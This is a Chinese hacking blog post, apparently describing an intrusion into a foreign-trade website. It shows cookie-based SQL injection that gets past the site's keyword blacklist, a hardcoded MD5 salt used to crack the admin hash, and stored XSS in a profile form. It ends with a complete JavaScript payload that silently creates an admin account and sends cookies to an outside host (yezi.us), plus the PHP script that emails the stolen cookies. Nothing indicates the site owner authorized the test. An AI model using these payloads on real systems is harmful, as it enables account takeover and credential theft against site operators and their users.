对某非主流外贸网站的渗透测试

首先粗略的看了下网站的整体结构、

clip_image001

发现不是那种5分钟就能叼下的垃圾企业站。

旁站看了下都是同一个程序做的

clip_image002

C 段我就懒的看了,因为像这种站所在机房你能ARP到数据的几率比中国足球队进世界杯还难。

话又说回来了。去年做外贸的时候公司用的貌似就是这套程序,当时只是粗略的看了下这套程序,没看出啥严重的漏洞。

最近公司无事,找以前同事拿来这套程序源码看了下。

发现如下安全问题:

New.asp 中

<!--#include file="top.asp"-->
<%
page=clng(request("page"))
Set rs=Server.CreateObject("ADODB.RecordSet")
sql="select * from member_news where type='"&request("type")&"' order by order0 desc"
rs.Open sql,conn,1,1
if rs.eof and rs.bof then
  response.Write("No news!")
else
%>

其中top.asp 中又包含了 inc/sql.asp 其内容为:

<%
'sql????
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
'????????????????????,?? "|" ????
Fy_In = "'|;|[| and | exec | insert | select | delete | update | count |*|%| chr | mid | master | truncate | char | declare "
'----------------------------------
Fy_Inf = split(Fy_In,"|")
'--------POST????------------------
If Request.Form<>"" Then
For Each Fy_Post In Request.Form
 
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
response.write"<script>//alert('sorry for you put which including irregular symbol:\"&Fy_Inf(Fy_Xh)&"');history.go(-1);</script>"
response.end
End If
Next
 
Next
End If
'--------GET????-------------------
If Request.QueryString<>"" Then
For Each Fy_Get In Request.QueryString
 
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
response.write"<script>//alert('sorry for you put which including irregular symbol:\"&Fy_Inf(Fy_Xh)&"');history.go(-1);</script>"
response.end
End If
Next
Next
End If
%>

老兄,你怎么不把cookies放在眼里。

后台登陆部分重要代码admin/login.asp

md5key="pjfmd5"
if request("action")="login" then
admin_name=trim(request("admin_name"))
admin_pass=md5(trim(request("admin_pass"))&md5key)

所以,把注入到的密文拿到cmd5破解:

Xxooxxoo:pjfmd5

就是明文了。

于是注入一枚叼到。为了安全起见咱本地先测试下,结果是明亮的。

但是这屌丝把后台改了,用这密码测试了下FTP 邮箱等,木有结果

SO  继续挖。

半小时后,发现inc/modify.asp

如下代码

	if request.Form("submit")<>"" then
	    set rs=server.createobject("adodb.recordset")
    sql="select * from [user] where User_Name='"&session("user_name")&"'"
    rs.open sql,conn,1,3
    if rs.eof and rs.bof then
        response.write"<script>//alert('Sorry,this User_name not exist! Please check it');history.back(-1)</script>"
        response.end()
    else
        for i=2 to rs.fields.count-1
        if rs.fields(i).Name="Password2" then
        elseif rs.fields(i).Name="Country" then
        rs(rs.fields(i).Name)=split(countrystr,",")((request.Form(rs.fields(i).Name)))
        elseif rs.fields(i).Name="Password" and(request.Form(rs.fields(i).Name))<>rs("password") then
            response.Write "<script>//alert('You have Changed the password!');</script>"
            rs(rs.fields(i).Name)=md5((request.Form(rs.fields(i).Name))&md5key)
        elseif rs.fields(i).Name="sex" then
            rs(rs.fields(i).Name)=(""<>(request.Form(rs.fields(i).Name)))
        else
            rs(rs.fields(i).Name)=(request.Form(rs.fields(i).Name))
        end if'save information
        next
        rs.update
        rs.close
    end if
    response.Write "<script>//alert('Modify success!');location='log.asp'</script>"
    response.End()
end if%>

相关没做任何处理直接入库了。也就是说我们可以在表单中插入我们的JS。

好的继续看下后台取数数据部分

/admin/member/6pjf.asp 中

	elseif request("ac")="<span style="font-family: 宋体;">会员管理</span><span style="font-family: 'Times New Roman';">" then</span>
	.............
	call rstotable(tcol_tname,where_order,"user",20,temptitle,"6pjfadd.asp","id","yes")

其中函数 rstotable

未做任何过滤就取出数据。

测试之
clip_image001[4]
呵呵,笑死
clip_image002[4]

根据相关条件,写了个JS利用。

添加管理员

记录cookies 发送到我的Q。坐等结果。

其中JS代码为:

document.write('Alabama');
    var xmlHttp;
    if(window.ActiveXObject){
        xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
    }
    else if(window.XMLHttpRequest)
    {
        xmlHttp = new XMLHttpRequest();
}
 
function validateForm() {
    str = window.location.pathname;
    var strs= new Array();
    strs=str.split("/");
    x = strs[1];
    var url = "/"+ x +"/member/6pjfadd.asp?ac=%ba%f3%cc%a8%d5%ca%ba%c5%c9%e8%d6%c3";
    var params ="admin_name=yezi&admin_pass=fuckyou&admin_alow=%C0%CF%B0%E5&addtime=2012-5-31+4%3A55%3A59&submit=%CC%ED%BC%D3%BC%C7%C2%BC&refer="+ document.referrer;
    xmlHttp.open("POST", url, true);
    xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlHttp.setRequestHeader("Content-length", params.length);
    xmlHttp.setRequestHeader("Connection", "close");
    xmlHttp.onreadystatechange = function() {
    if(xmlHttp.readyState == 4 && xmlHttp.status == 200) {
    //alert(xmlHttp.responseText);
        }
    }
xmlHttp.send(params);
}
validateForm();
(function(){
    var a=document.createElement('script');
    a.setAttribute('type', 'text/javascript');
    a.setAttribute('src', 'http://yezi.us/xss.php?cookie='+document.cookie);
    document.getElementsByTagName('head').item(0).appendChild(a);
    })()

XSS.php 代码为:

<!--?php
date_default_timezone_set('Asia/Shanghai');
$a=@$_GET['cookie'];
$ref=$_SERVER['HTTP_REFERER'];
$data=$a."---cookie"."\r\n".$ref."---referer"."\r\n";
$to='5078****@qq.com';
$subject = 'You have something From : '.$ref;
$body="\n-------URL= ".$ref."\n-------Time = " .date("Y-m-d H:i:s")."\n-------Data = ".$data."\n----------------------------------------------";
$headers= 'MIME-Version: 1.0' . "\r\n";
$headers.= 'Content-type: text/html; charset=utf-8' . "\r\n";
$headers.="Here Come Some Password";
if(!empty($a)){
    $sendmail = @mail($to, $subject, $body, $headers);
    if(!$sendmail){
        @$file = fopen('xsstest.txt' , 'a+');
        @$write = fwrite($file,$a.$ref.$data."\r\n");
        @fclose($file);
    }
}else{
    echo "Hey , man ,What r u doing ? ";
}
?—>
 
源链接

Hacking more

...